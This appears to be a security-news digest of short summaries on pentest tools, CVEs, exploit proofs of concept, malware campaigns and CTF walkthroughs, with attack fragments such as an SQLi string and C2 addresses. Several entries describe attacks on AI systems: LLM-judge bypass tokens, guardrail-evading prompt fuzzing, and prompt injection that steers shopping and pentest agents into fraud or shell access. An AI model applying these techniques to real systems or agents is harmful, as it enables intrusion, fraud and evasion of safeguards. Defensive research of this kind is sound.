AndroHunter is an on-device Android pentesting toolkit for bug bounty hunters. It performs static APK/DEX/Manifest analysis (multi-dex, secret scanning, exported components), dynamic fuzzing of Intents/Broadcasts/ContentProviders (9 SQLi payloads/provider), and FileProvider path analysis (risk-rated) with traversal + ContentResolver reads and ADB repro (adb shell content read --uri '...'). It also generates Frida scripts (SSL pinning/root/login/crypto/SQL/HTTP hooks) with a run command template and includes SSL pinning bypass methods (e.g., objection android sslpinning disable). Built-in proxy runs on 127.0.0.1:8877 with curl export.

🛠️ Tool | 📱 iOS | 🧬 DYLIB Injection | 🔑 Keychain

🔗 Original article: https://github.com/test1ng-guy/iOS-sandbox-explorer

A CLI tool that injects libShell.dylib into an iOS IPA, patches entitlements/Info.plist, re-signs using a free Apple ID (SRP + anisette headers), installs via ideviceinstaller, and exposes an in-app TCP server on port 8080 reachable over USB with iproxy. A Python client runs sandbox-safe commands (no popen/exec) to browse/exfil sandbox files (base64 “scp”) and dump keychain items accessible to the app. No CVEs; scope is the app sandbox.

🛡️ SQLi | 🌐 Web | 🔐 IDOR | 🤖 AI

🔗 Original article: https://codewall.ai/blog/how-we-hacked-mckinseys-ai-platform

An autonomous agent targeted McKinsey’s internal AI platform “Lilli” and leveraged publicly exposed API docs plus 22 unauthenticated endpoints. A key bug was SQL injection through JSON keys (field names) concatenated into SQL while values were parameterized; reflected DB errors enabled ~15 iterative probes until production data was returned. The agent then chained an IDOR for cross-user access and claims massive plaintext data exposure plus DB write access that could modify system prompts (prompt-layer integrity compromise). No CVEs/PoC payloads are published.

🛠️ Tool | 📱 Mobile | 🌐 MITM | 🧬 Reversing

🔗 Original article: https://github.com/secuworm2/frida-android-helper2

FAH (Frida Android Helper) is a Python 3 CLI that automates Android pentesting tasks via ADB using pure-python-adb: frida-server lifecycle management (incl. GitHub updates), global proxy setup, reverse-tether proxying via adb reverse + iptables DNAT (default 8844), screenshots, app data directory snapshots, CA cert generate/install for MITM, APK download/list/start/stop/clear, intent enumeration/execution (including receiver action parsing and per-action am broadcast generation with fallback -a fah.intent.TEST), tcpdump PCAP capture (-i any, optional UID filter), clipboard helpers, and runtime DEX dumping by hooking ART DefineClass (inspired by frida_dump).

🛠️ Tool | 🧠 AI | 🧬 Prompt Injection | 🧪 Fuzzing

🔗 Original article: https://unit42.paloaltonetworks.com/fuzzing-ai-judges-security-bypass/

Unit 42 introduces AdvJudge-Zero, a black-box fuzzer for “AI judges” (LLM gatekeepers) that finds stealth, low-perplexity trigger tokens (e.g., \n\nAssistant:, ###, 1., -, User:) that flip decisions from block→allow. It uses next-token distribution probing and iterative refinement with logit-gap (yes/allow vs no/block) analysis to isolate “decisive control elements.” Impacts include safety-filter bypass and RLHF reward hacking (e.g., The correct answer is: / \begin{enumerate}), causing harmful approvals or training-signal corruption.

🌐 Web | 🛡️ CVE | 💉 SQLi | 🎁 PoC

🔗 Original article: https://www.tenable.com/blog/leakylooker-google-cloud-looker-studio-vulnerabilities

Tenable’s “LeakyLooker” found 9 cross-tenant Looker Studio flaws enabling 0-click (owner-credential) and 1-click (viewer-credential) attacks against connectors like BigQuery/Spanner/JDBC DBs. Exploits include alias-based SQLi in batchedDataV2 with /**/ + CHR(46) bypasses, “Copy report” cloning JDBC stored creds (“sticky credentials”) enabling arbitrary CRUD via Custom Query, and NATIVE_DIMENSION BigQuery scripting with comment-split keyword bypass and log-based blind exfiltration. Google patched server-side.

📱 Mobile | 🪙 Crypto | 🕵️ RAT | 💰 Banker

🔗 Original article: https://securelist.com/beatbanker-miner-and-banker/119121/

BeatBanker is a Brazil-focused Android malware chain delivered via a fake Google Play site (cupomgratisfood[.]shop). A packed APK uses libludwwiuh.so to decrypt/load l.so, which calls Java via XOR stack-strings, profiles via ipapi.is, loads DEX filelessly with InMemoryDexClassLoader (Frida can extract), and self-kills with Process.killProcess on analysis checks. Clicking a fake UPDATE downloads/decrypts an ARM XMRig 6.17.0 miner (CipherInputStream; key = SHA-1(filename)) that mines via pool.fud2026[.]com:9000 with proxy failover. Older waves add an Accessibility banker that overlays Binance/Trust Wallet and swaps USDT addresses via ACTION_SET_TEXT; newer waves drop BTMOB RAT.

🌐 Web | 🦠 Malware | 🧠 Social Engineering | 🎁 PoC

🔗 Original article: https://www.rapid7.com/blog/post/tr-malicious-websites-wordpress-compromise-advances-global-stealer-operation

Rapid7 details a large campaign where compromised WordPress sites inject stealthy ClickFix JavaScript that overlays a fake Cloudflare CAPTCHA. The iframe copies a PowerShell command, leading victims to run fileless stagers that allocate RWX memory (0x40), execute shellcode via VirtualAlloc/CreateThread, then run a “DoubleDonut” two-stage Donut loader (cptch.bin → downloader → cptchbuild.bin) injected into svchost.exe. Final payloads include Vidar, a new encrypted .NET stealer (“Impure”), and a new C++ stealer (“VodkaStealer”).

🛡️ CVE | 🧬 Privesc | 🐧 Linux | 🔗 Symlink

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-26-186/

ZDI-26-186 (CVE-2026-24018) is a Fortinet FortiClient local privilege escalation. A low-privileged attacker can create a symlink to trick a privileged FortiClient service into loading an attacker-controlled shared object (.so). When the service follows the symlink and loads the library, attacker code executes as root, yielding root-level RCE. CVSS v3.0: 7.8 (AV:L/AC:L/PR:L/UI:N). Fixed via Fortinet update (FG-IR-26-083).

🛠️ Tool | 🛡️ CVE | 🌐 Web | 💣 RCE

🔗 Original article: https://devansh.bearblog.dev/needle-in-the-haystack/

The post explains how to use LLM agents (e.g., OpenAI Codex) for vuln research without manual review: keep context small, build a threat model from past CVEs, audit thin slices (auth/parsing/egress), demand call-chain evidence, then verify with tests/harnesses/fuzzing/static checks. It summarizes real findings: Parse Server authz/readOnlyMasterKey bypasses (CVE-2026-29182/30228/30229) and JWT aud skip (CVE-2026-30863); HonoJS JWT/JWKS alg confusion (CVE-2026-22817/22818); ElysiaJS cookie signature bypass (decoded init bug); harden-runner UDP syscall gap (CVE-2026-25598); BullFrog DNS/IP binding + Docker sudo bypass; Better-Hub XSS/cache leaks/OAuth exposure.

Web3 | RCE | Tool | PoC

🔗 Original article: https://blog.trailofbits.com/2026/03/11/six-mistakes-in-erc-4337-smart-accounts/

Trail of Bits explains ERC-4337 smart account flow (UserOperation → bundler → EntryPoint.validateUserOp → execution) and six common high-severity audit findings: (1) unprotected execute paths allow direct wallet drains; (2) signatures must bind gas fields (esp. preVerificationGas) or attackers inflate fees; (3) writing state in validateUserOp is clobbered due to bundle-wide validate-then-execute ordering; (4) ERC-1271 must use EIP-712 domain separation to prevent replay across accounts/chains; (5) validate success commits fee payment even if execution/postOp reverts, enabling fee/pool drains; (6) ERC-7702 init must be self-only + one-time to prevent frontrun takeovers.

🛠️ Tool | 💰 Bug Bounty | 🌐 Web | 🛡️ CVE

🔗 Original article: https://github.com/FVLCN/secrets-hunter

Secrets Hunter is a dependency-free Python 3.11+ CLI tool for secret scanning. It combines regex-based detection with high-entropy detection and boosts confidence when entropy hits appear in credential-like assignment/key-value contexts (e.g., API_KEY=..., "secret_token": "..."). It supports parallel scanning, masked findings by default (--reveal-findings to show), JSON export (--json results.json), and layered TOML configuration overlays applied in order.

🦠 Malware | 🧨 Wiper | 🪟 Windows | 🕵️ TTPs

🔗 Original article: https://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/

Void Manticore’s Handala Hack runs hands-on intrusions that end in high-impact destruction. Initial access commonly uses compromised VPN credentials (often via service-provider targeting) plus brute-force attempts. Operators dump LSASS via rundll32/comsvcs.dll, export registry hives (incl. via shadow copy), run ADRecon (dra.ps1), move via RDP, and deploy NetBird for internal tunneling. Destruction is pushed via GPO logon scripts/scheduled tasks: a custom wiper with MBR/disk-structure wipe, an AI-assisted PowerShell deleter for C:\Users plus space-filling copies, VeraCrypt encryption, and manual VM/file deletion.

🛠️ Tool | 🌐 Web | 🧩 Supply Chain | 🧪 Malware

🔗 Original article: https://redcanary.com/blog/threat-detection/assemblyline-browser-extensions/

Red Canary describes a practical method to catch malicious browser-extension supply-chain updates by statically analyzing and diffing the old vs new extension ZIPs in Assemblyline. It flags new/updated service workers and content scripts, new domains, and new heuristic signatures (e.g., Base64Decoding, CookieHarvesting), plus entropy + modified z-score anomalies. Includes a Cyberhaven case study (24.10.2 → 24.10.4) and Python code using assemblyline_client with selected Assemblyline services (Extract, Characterize, JsJAWS, etc.).

🛡️ CVE | 🪟 Windows | 🛠️ Tool | 🎁 PoC

🔗 Original article: https://trustedsec.com/blog/lnkmemaybe-a-review-of-cve-2026-25185

TrustedSec reverse-engineers Windows .lnk parsing and explains CVE-2026-25185: a crafted shortcut can trigger outbound Windows authentication (credential leak/relay primitive) when a folder is merely viewed. During CShellLink::_LoadFromStream (windows.storage.dll), presence of DARWIN_PROPS (0xa0000006) leads to _UpdateIconFromExpIconSz, which reads ICON_ENVIRONMENT_PROPS (0xa0000007), indexes 268 bytes to TargetUnicode, expands env vars, and calls PathFileExistsW—allowing UNC paths to force auth. Includes Procmon stack-trace workflow and the LnkMeMaybe (.NET 8) 🎁 PoC generator/UI/CLI.

Android | RAT | Phishing | Fraud

🔗 Original article: https://zimperium.com/blog/pixrevolution-the-agent-operated-android-trojan-hijacking-brazils-pix-payments-in-real-time

PixRevolution is an Android banking trojan that hijacks Brazil’s PIX transfers using an agent-in-the-loop model: victims install a malicious APK (often from fake Play Store lookalikes), enable an Accessibility service for cross-app control, and the malware streams the screen via MediaProjection to a remote operator who triggers recipient-key replacement (ACTION_SET_TEXT) and confirmation taps (dispatchGesture) under a deceptive overlay.

Malware | Windows | Espionage | C2

🔗 Original article: https://unit42.paloaltonetworks.com/espionage-campaign-against-military-targets/

Unit 42 details CL-STA-1087 (tracked to at least 2020), a suspected China-nexus espionage cluster targeting Southeast Asian militaries. Initial detection involved PowerShell that slept 21,600 seconds then opened reverse shells to listed C2 IPs. Attackers spread via WMI/.NET, persisted via services and System32 DLL hijacking into VSS. AppleChris uses Pastebin/Dropbox DDR (Base64 then RSA-1024) to resolve C2, then RSA registration plus AES tasking, custom HTTP verbs, and a command set including reverse TCP tunneling ('?'). MemFun is modular and largely fileless: timestomping, process hollowing into dllhost.exe (XOR 0x25), reflective loading with 4KB PE header wipe, custom 'Q' HTTP to /DL1, and per-session Blowfish key sent via Cookie. Getpass (Mimikatz-derived) enables SeDebugPrivilege and...

📱 Mobile | 🧬 Bootloader | 🛡️ Vuln Chain | 🎁 PoC

🔗 Original article: https://www.androidauthority.com/qualcomm-snapdragon-8-elite-gbl-exploit-bootloader-unlock-3648651/

A Qualcomm Android 16 exploit chain abuses ABL’s claimed failure to authenticate GBL loaded from the efisp partition, allowing unsigned UEFI code execution. A fastboot OEM command parsing bug (set-gpu-preemption) lets attackers append androidboot.selinux=permissive, flipping SELinux to Permissive to enable otherwise-blocked actions like writing to efisp. On Xiaomi 17 series, a privileged HyperOS MQSAS IMQSNative Binder service is used to write the payload, which then sets is_unlocked=1 and is_unlocked_critical=1 (equivalent to fastboot oem unlock).

🛡️ CVE | 💣 RCE | 🛠️ Tool | 🔎 Recon

🔗 Original article: https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-03-13-2026

Rapid7’s Metasploit Wrap-Up (Mar 13, 2026) adds: (1) LeakIX API recon module (auxiliary/gather/leakix_search) to find exposed services and leaked creds/DBs, (2) Linux x64 RC4 payload packer (evasion/linux/x64/rc4_packer) with optional nanosleep delay and runtime decrypt+exec stub, and (3) SPIP Saisies unauthenticated PHP code-injection RCE exploit module for CVE-2025-71243 via the _anciennes_valeurs parameter. Also: smaller configurable bind_netcat payload, WordPress auto service reporting, and Base64Decoder default fix.

🌐 Web | 🛡️ CVE | 💉 SQLi | 💣 RCE

🔗 Original article: https://0xdf.gitlab.io/2026/03/14/htb-gavel.html

HTB Gavel (Linux) is a PHP auction site exposing /.git, allowing full source recovery via git-dumper. Using recovered code, the post describes a SQLi that bypasses PDO backtick-quoted “prepared” query building (likely via sort/ORDER BY) to dump the DB, crack a bcrypt hash, and access an admin panel. Admin features plus PHP runkit enable arbitrary rule code injection for web RCE. Password reuse enables a user pivot. A root-only validation daemon “sandboxes” rules with a restrictive php.ini, but file_put_contents remains enabled, letting attackers overwrite php.ini and then resubmit rules for a root shell.

🛠️ Tool | 🪝 Hooking | 🪟 Windows | 🥷 Evasion

🔗 Original article: https://maorsabag.github.io/posts/adaptix-stealthpalace/sleeping-beauty/

Walkthrough of hardening a reflectively loaded Adaptix C2 agent DLL with Crystal Palace: force real IAT imports (e.g., WaitForSingleObject) so import-time hooks work, install a resident PICO that hooks GetProcAddress + __resolve_hook(ROR13), and wrap long waits/IPC (WaitForSingleObject(Ex), WaitForMultipleObjects, ConnectNamedPipe) with Ekko-style sleep obfuscation using CreateTimerQueueTimer + NtContinue CONTEXT frames and RC4 (SystemFunction032). Includes loader/pico specs and linker fixes like -mno-stack-arg-probe for ___chkstk_ms.

🛠️ Tool | 🛡️ EDR | 💣 RCE | 🎁 PoC

🔗 Original article: https://lorenzomeacci.com/bypassing-edr-in-a-crystal-clear-way

Deep Windows tradecraft post explaining how C2 DLL payloads (Cobalt Strike) work and how to build an evasive in-memory loader that bypasses Elastic EDR. Covers reflective DLL injection internals, CS 4.9 raw DLL generation (BEACON_RDLL_SIZE=0), mapping at ImageBase to avoid reloc issues, COFF relocation inspection, import resolution into a sacrificial module, NtContinue-based entry transfer, fake-stack/call-stack spoofing, and Crystal Palace XOR encryption + key prepending to defeat YARA/islands-of-invariance.

🛠️ Tool | 📱 Mobile | 🔍 Reverse Engineering | 🧬 Static Analysis

🔗 Original article: https://github.com/deemoun/PulseAPK-Core

PulseAPK Core is an Avalonia/.NET 8 cross-platform GUI that wraps apktool + Uber APK Signer to decompile, analyze (regex-based Smali rules), rebuild, and optionally sign Android APKs. Its rule set (APK_ANALYSIS_RULES.md) scans Smali line-by-line with context hints and library-prefix filtering to detect root checks, emulator detection logic, and likely hardcoded credentials.

🛡️ CVE | 💣 RCE | 🛠️ Tool | 🎁 PoC

🔗 Original article: https://github.com/SafeBreach-Labs/EventLogin-CVE-2025-29969

CVE-2025-29969 (EventLog-in) is a TOCTOU bug in Windows’ MS-EVEN (Eventlog) protocol that lets an authenticated low-priv user perform arbitrary remote file writes, bypassing the expected admin requirement. This repo provides a 🎁 PoC weaponizer (write_file_remotely.py) that stages a valid .evtx on an Impacket SMB share and writes attacker-chosen files to attacker-chosen remote paths (example: dropping a .bat in the user Startup folder for execution on next logon). It also includes check_if_exists.py, using the MS-EVEN CreateFile primitive for remote path existence recon (example output: FILE_EXISTS_AND_IS_DIRECTORY).

🛡️ CVE | 💣 RCE | 🪟 Windows | 🎁 PoC

🔗 Original article: https://www.safebreach.com/blog/safebreach_labs_discovers_cve-2025-29969/

SafeBreach details CVE-2025-29969 in Windows MS-EVEN (EventLog RPC): a TOCTOU flaw lets low-privileged users remotely write arbitrary files by opening a valid EVTX over attacker SMB (ElfrOpenBELW), swapping file contents after the 128-byte header check, then backing it up to a chosen path (ElfrBackupELFW). This enables RCE via Startup-folder .bat execution or missing-DLL hijacking (e.g., OneDrive). It also leaves an NTSTATUS-based file-existence recon oracle. Public PoC repo included.

🛡️ CVE | 🪟 Windows | ⬆️ EoP | 🎁 PoC

🔗 Original article: https://www.mdsec.co.uk/2026/03/rip-regpwn/

RIP RegPwn (CVE-2026-24291) is a Windows 10/11 + Server 2012–2025 local EoP fixed in March 2026. It abuses Accessibility registry propagation during Secure Desktop: a user-writable per-session HKLM key (...\Accessibility\Session<id>\ATConfig\osk) is swapped to a registry symlink during an oplock-won race (oskmenu.xml), redirecting SYSTEM writes into an arbitrary registry key. PoC overwrites msiserver ImagePath and starts it via MSI COM to run as SYSTEM. Exploit code is published on GitHub.

🛡️ CVE | 🪟 Windows | ⬆️ LPE | 🎁 PoC

🔗 Original article: https://github.com/mdsecactivebreach/RegPwn

RegPwn is a C# 🎁 PoC for Windows LPE CVE-2026-24291 (Accessibility/ATBroker.exe). It launches osk.exe, writes attacker data into HKCU...\Accessibility\ATConfig\osk, then uses an exclusive oplock on oskmenu.xml to hit a race window. When triggered, it deletes the per-session HKLM Accessibility ATConfig key and recreates it as a REG_LINK (SymbolicLinkValue → \Registry\Machine\...). This redirects privileged registry operations to an attacker-chosen HKLM key (e.g., service ImagePath), enabling privilege escalation.

🛠️ Tool | 🪟 Windows | 🛡️ CVE | 🎁 PoC

🔗 Original article: https://github.com/Flangvik/RegPwnBOF

RegPwn BOF is a Cobalt Strike BOF + standalone x64 port of RegPwn for CVE-2026-24291. It exploits a Windows Accessibility ATConfig registry symlink race to write arbitrary values into protected HKLM keys as a normal user, then converts that into SYSTEM execution by hijacking service registry values (e.g., ImagePath or Parameters\ServiceDll). Default target is msiserver because it runs as SYSTEM and can be started by non-admin users (net start msiserver). Pre–March 2026 patch Windows builds are affected.

🤖 LLM | 🧬 Fuzzing | 🧨 Prompt Injection | 🛡️ Defense

🔗 Original article: https://unit42.paloaltonetworks.com/genai-llm-prompt-fuzzing/

Unit 42 describes a genetic-algorithm-inspired prompt fuzzer that generates meaning-preserving variants of disallowed prompts using 3 lists (keyword/relative words/filler phrases) and 6 mutations (prepend/append phrase, newline, repeat keyword, add relative word, remove word). Testing 100 variants each for bomb/napalm/ordnance/torpedo via API against 2024–2025 models found keyword-dependent bypasses (e.g., 90/100 for “torpedo” on one closed model) and extremely high false negatives (97–99/100) for a standalone content-filter model. No CVEs; the risk is scalable automated guardrail evasion.

📡 IoT | 💣 RCE | 🛠️ Tool | 🎁 PoC

🔗 Original article: https://github.com/TaszkSecLabs/xiaomi-c400-pwn

Xiaomi C400 factory-state root RCE PoC. The repo TaszkSecLabs/xiaomi-c400-pwn contains exploit.py that compromises a Xiaomi Smart Camera C400 (tested on 5.1.5_0379; reportedly still on 5.1.6_0423) when it’s factory-reset and the attacker is on the camera setup Wi‑Fi (192.168.14.1). It speaks miIO-like UDP on 54321, bypasses setup signing/HMAC checks (sending sign:"foo"), then triggers an AES-CBC length/padding mismatch overflow to run a Thumb ROP chain that writes bind-shell shellcode via /proc/self/mem and opens TCP 5555.

IoT | RCE | PoC | Tool

🔗 Original article: https://labs.taszk.io/articles/post/nowyouseemi/

Research on the Xiaomi C400 camera reports 3 miIO (UDP/54321) setup flaws: (1) handshake auth bypass by replaying device-provided values, (2) predictable uClibc ALFG PRNG enabling prediction/eavesdropping (including Wi‑Fi credential exposure), and (3) AES-CBC decrypt length-handling bug causing a controlled 16-byte heap overflow via header-length vs UDP-length mismatch. The described chain uses fastbin corruption, a fixed-address fake chunk in non-PIE memory, function-pointer overwrite, ARM gadget chaining/stack pivot to ROP, then /proc/self/mem writes to plant bind-shell shellcode for root RCE. GitHub PoCs and a persistent cloud-jailbreak (LD_PRELOAD + firewalling) are included.

IoT | RCE | Reverse Engineering | PoC

🔗 Original article: https://labs.taszk.io/articles/post/nowyouseemi/

The post describes hacking a Xiaomi C400 camera via its UDP/54321 miIO setup protocol: (1) a setup/auth bypass, (2) predictable uClibc ALFG PRNG enabling future session key prediction and eavesdropping of setup traffic (including Wi‑Fi credentials), and (3) a heap overflow in AES-CBC decrypt for non-16-byte ciphertext lengths. The exploit chains setup bypass + fastbin corruption to overwrite a function pointer, chain ARM gadgets, pivot the stack, and ROP-call open/lseek/write on /proc/self/mem to plant bind-shell shellcode. A post-exploit “cloud jailbreak” adds persistence via a boot script and LD_PRELOAD hijack, streams MPEG-TS over TLS, and blocks cloud traffic via firewall rules.

Mobile | Reverse Engineering | CVE | Anti-Debug

🔗 Original article: https://blog.calif.io/p/taking-apart-ios-apps-anti-debugging

Layered iOS anti-debug/anti-tamper techniques in the wild: private-API side-channel installed-app detection, self-attestation via csops entitlements, integrity checks (hashes/cert/Mach-O metadata), kill-on-attach via ptrace(PT_DENY_ATTACH) plus abort/exit, register corruption before crashing, jetsam via memory exhaustion (no normal crash log), and periodic heartbeat/timer checks with delayed enforcement.

📱 Mobile | 🧬 Hooking | 🛠️ Tool | 💰 Fraud

🔗 Original article: https://www.cloudsek.com/blog/weaponizing-lsposed-remote-sms-injection-and-identity-spoofing-in-modern-payment-ecosystems-2

CloudSEK details an Android payment-fraud evolution: attackers use LSPosed modules on rooted devices to “gaslight” banking apps without repacking APKs. The “Digital Lutera” module hooks SmsManager.sendTextMessage (suppresses via param.setResult(null)), spoofs getLine1Number() / SubscriptionInfo.getNumber(), and injects fake rows into content://sms/sent (type=2, status=0) on Socket.IO C2 commands while exfiltrating tokens/OTPs to Telegram. Combined with a victim SMS trojan, this enables SIM-binding bypass, account takeover, PIN resets, and scalable fraud.

☁️ Cloud | 🧠 LLM/Agent | 💣 RCE | 🧗 Privesc

🔗 Original article: https://blog.richardfan.xyz/2026/03/14/pentesting-a-pentest-agent-heres-what-ive-found-in-aws-security-agent.html

The post finds 4 issues in AWS Security Agent. (1) “DNS confusion”: abuse Route53 private hosted zones to pass VPC-only verification for an “Unreachable” domain, then flip the A record to a public IP after “Setup testing environment” so the agent scans a public victim via NAT. (2) Malicious targets can coerce command execution via link-following with shell substitution, pivot to an HTTP-tunneled reverse shell (HTTP-Shell), sudo to root (NOPASSWD python), escape via /var/run/docker.sock, then steal IMDS instance-role creds and write to CloudWatch Logs. It also shows destructive payloads/cleanup and unredacted secrets in reports.

📱 iOS | 🛡️ CVE | 💣 RCE | ⛓️ Exploit Chain

🔗 Original article: https://cloud.google.com/blog/topics/threat-intelligence/darksword-ios-exploit-chain/

DarkSword is an in-the-wild iOS 18.4–18.7 full-chain exploit kit observed since Nov 2025. It uses multi-stage web loaders (hidden iframes, synchronous XHR, worker-from-Blob) to deliver pure-JavaScript exploits chaining JavaScriptCore bugs (CVE-2025-31277 / CVE-2025-43529) with a dyld PAC bypass (CVE-2026-20700) plus ANGLE and kernel bugs (CVE-2025-14174, CVE-2025-43510) to reach kernel privileges. Post-exploit JS implants (GHOSTKNIFE/GHOSTSABER/GHOSTBLADE) exfiltrate broad data and delete crash logs.

📱 Mobile | 🧰 Tool | 🦠 Malware | 🕵️ Spyware

🔗 Original article: https://iverify.io/blog/oblivion-rat-android-spyware-analysis

Oblivion RAT is an Android MaaS spyware platform ($300/month) with a web APK factory, a dropper builder, and a real-time C2 panel. Infection is 2-stage: a dropper (with payload.apk.xz) uses 3 standalone HTML pages to fake a Google Play “update” and trigger installation via REQUEST_INSTALL_PACKAGES plus “Allow from this source.” The implant (oblvn.sbs) abuses AccessibilityService with a fake settings UI and hide_permission_process to silently grant SMS/storage/notification/device-admin permissions, hide its icon, and persist. Anti-analysis sets classes.dex ZIP flag 0x0809 (fake encryption). Config is plaintext base64 (C2 89.125.48.159:8888, OBL_ token).

🧠 AI | 🦠 Malware | 🛠️ Tool | 🌐 Web

🔗 Original article: https://unit42.paloaltonetworks.com/ai-use-in-malware/

Unit 42 (Mar 19, 2026) analyzes OSINT-hunted malware using OpenAI LLMs via HTTP APIs for remote decision-making. A ConfuserEx-obfuscated .NET 4.0 infostealer calls GPT-3.5-Turbo through four functions; most outputs are only logged to victim_logs.txt ("AI theater"), except a 1000–5000 ms LLM-driven sleep and exfil with X-Message / X-LLM-Enhanced headers to hxxp[:]//localhost:3002/crypto-data. A Go dropper decrypts Donut shellcode and asks GPT-4 to classify host “safety” (process list, network, uptime, USB) before deploying a Sliver payload.

🛡️ CVE | 🌐 Web | 💉 SQLi | 🎁 PoC

🔗 Original article: https://blog.securelayer7.net/cve-2026-22730-sql-injection-spring-ai-mariadb/

CVE-2026-22730 (CVSS 8.8) is a SQL injection in Spring AI’s MariaDB Vector Store filter conversion. MariaDBFilterExpressionConverter.doSingleValue() wraps strings as '%s' but doesn’t escape quotes/backslashes, so payloads like ' OR '1'='1 turn the generated WHERE clause into an always-true condition. This bypasses metadata-based authorization in RAG retrieval and can also wipe data via an unparameterized DELETE ... WHERE <filter> path. Fixed in Spring AI 1.0.4 / 1.1.3 by adding emitSqlString() and making doSingleValue() abstract.

🛡️ CVE | 🌐 Web | 🎟️ OAuth | 🕵️ Log Bypass

🔗 Original article: https://trustedsec.com/blog/full-disclosure-a-third-and-fourth-azure-sign-in-log-bypass-found

TrustedSec discloses Azure Entra ID sign-in log bypasses that let attackers validate passwords—and in the newer “GraphGoblin” case obtain usable OAuth bearer tokens—without generating corresponding Entra sign-in log entries. The post explains normal OAuth2 ROPC token requests to login.microsoftonline.com and recaps GraphNinja/GraphGhost. GraphGoblin works by sending a huge but valid scope string (e.g., repeating openid 10,000 times), yielding a token while the successful sign-in remains invisible, likely due to backend logging/DB column overflow causing log insert failure.

🧠 Detection | 🖱️ Social Engineering | 🍎 macOS | 🪟 Windows

🔗 Original article: https://redcanary.com/blog/threat-intelligence/intelligence-insights-march-2026/

Red Canary’s Intelligence Insights: March 2026 summarizes threats seen in February 2026. ScreenConnect stays #1 via phishing (party invites/social security lures), sometimes chaining other RMMs (Datto/CentraStage/Syncro) to install it. A four-way #2 tie (ClearFake, Scarlet Goldfinch, Atomic Stealer/AMOS, MacSync) is driven by paste-and-run/FakeCAPTCHA execution. Atomic uses AppleScript numeric string obfuscation (character subtraction). MacSync is delivered via a Homebrew-style curl lure and stages theft using ditto into /tmp/. Vidar (#6) resurges via paste-and-run -> mshta/curl -> challengecf.exe, browser injection, Telegram-related network attempts, and self-delete.

📱 Android | 🧬 Reverse Engineering | 🛠️ Tool | 🎁 PoC

🔗 Original article: https://mwalkowski.com/post/decompiling-an-android-application-written-in-net-maui-9-xamarin/

The post shows a practical reverse-engineering workflow for .NET MAUI 9 Android apps: managed assemblies are embedded inside libassemblies.<arch>.blob.so as an ELF payload section. Use llvm-readelf to locate payload, llvm-objcopy --dump-section=payload=payload.bin to extract it, verify XABA (0x41424158), parse the 20-byte header + 28-byte descriptors + length-prefixed UTF-8 names, and carve out each DLL by data_offset/data_size. If output starts with XALZ, decompress via Python lz4.block (size at bytes 8–12).

🛠️ Tool | 📱 Mobile | 🕵️ MITM | 🌐 Web

🔗 Original article: https://github.com/SahilH4ck4you/iOS-SSL-pinning-bypass-without-jalibreak

Bash-script repo to build an iOS interception lab without jailbreak: set up an OpenVPN server and apply iptables NAT rules that transparently redirect VPN tunnel traffic on tun0 (TCP/80 and TCP/443) to a local proxy listener on TCP/8080 (Burp Suite/mitmproxy “invisible proxying”). Includes commands and a step-by-step flow plus iOS CA installation steps. Not a CVE; it’s controlled MITM plumbing whose impact is traffic decryption/inspection when apps don’t properly pin TLS.

🛡️ CVE | 💉 XSS | 🌐 Web | 🎁 PoC

🔗 Original article: https://www.rapid7.com/blog/post/ve-cve-2026-31381-cve-2026-31382-gainsight-assist-information-disclosure-xss-fixed

Rapid7 disclosed a chained vuln in Gainsight Assist’s OAuth callback on app.gainsight.com. CVE-2026-31381 leaks user emails because the OAuth failure URL contains a Base64-encoded state with PII (harvestable from logs/proxies/history). CVE-2026-31382 reflects error_description, enabling HTML injection and Safari-only XSS/WAF bypass using onpagereveal, supporting trusted-domain phishing and potential looping resource exhaustion. XSS fixed server-side Mar 6, 2026; plugins patched Mar 9, 2026.

🏢 Active Directory | 🪟 Windows | 🧩 Lateral Movement | 🛠️ Tool

🔗 Original article: https://sensepost.com/blog/2026/from-flat-networks-to-locked-up-domains-with-tiering-models/

The post shows why flat AD networks fall quickly: privileged users log into reachable servers, leaving LSASS artifacts (cleartext/NT hash/tickets) that enable Pass-the-Hash to DCs via NetExec. It then demonstrates alternative “security context” theft even if LSASS dumping is blocked: access-token impersonation (Impersonate tool), Shadow RDP via the Terminal Services Shadow registry policy, and scheduled tasks that run as a logged-on user—used to spawn real CredUI prompts (C# CredUIPromptForWindowsCredentials/CredUnPackAuthenticationBuffer) and even request PFX certs. It closes with actionable tiering/segmentation designs incl. Tier -1 backups off-domain.

🛠️ Tool | 🌐 Web | 🐧 Linux | 🧱 Hardening

🔗 Original article: https://www.synacktiv.com/en/publications/deep-dive-into-the-deployment-of-an-on-premise-low-privileged-llm-server.html

Synacktiv details a low-privilege on‑prem LLM deployment (Debian 13 + llama.cpp + gpt-oss-120b) focused on isolation and reducing attack surface. It shows rootless Podman + CDI GPU mapping, containers with --network=none using a UNIX socket, nginx endpoint allowlisting motivated by historical /slots prompt leakage, and SSH port forwarding. It hardens NVIDIA driver exposure by minimizing modules, locking module loading, and fixing insecure /dev/nvidia* permissions (including why nvidia-uvm ignores NVreg settings). Vulkan backend is recommended to avoid binding /dev/nvidia-uvm with minimal perf loss.

🤖 AI | 🎯 Prompt Injection | 🛡️ Fraud | 🌐 Web

🔗 Original article: https://unit42.paloaltonetworks.com/retail-fraud-agentic-ai/

Unit 42 (March 20, 2026) shows how UCP-style agentic commerce can enable fraud via web-based indirect prompt injection. Example 1: a malicious coupon site injects instructions to alter $CartMandate$ by adding a hidden $100 Digital Gift Card, setting $recipient_email=attacker@xyz[.]com and $display_status=hidden, so the agent includes it in the final JSON-RPC checkout request. Example 2: a marketplace listing injects a “System” rule to skip order.return.verify and call settlement.refund.instant() using tracking void-000, enabling scalable refund fraud.

🌐 Web | 💣 RCE | 🛠️ Tool | 🧩 LPE

🔗 Original article: https://0xdf.gitlab.io/2026/03/21/htb-conversor.html

Flask app converts Nmap XML to HTML using user-supplied XSLT (libxslt via lxml). In /convert, uploaded files are saved with os.path.join(UPLOAD_FOLDER, user_filename) allowing ../ traversal or absolute-path writes. Because a leaked cron job runs python3 /var/www/conversor.htb/scripts/*.py every minute, writing a .py there yields RCE as www-data. Alternate write primitive: libxslt EXSLT exslt:document. Then an MD5 password in SQLite is cracked for a pivot, and root is gained via needrestart LPE (CVE-2024-48990 / config abuse).

💣 RCE | ☁️ Cloud | 🧵 Race Condition | 🔐 Kubernetes

🔗 Original article: https://flatt.tech/research/posts/remote-command-execution-in-google-cloud-with-single-directory-deletion/

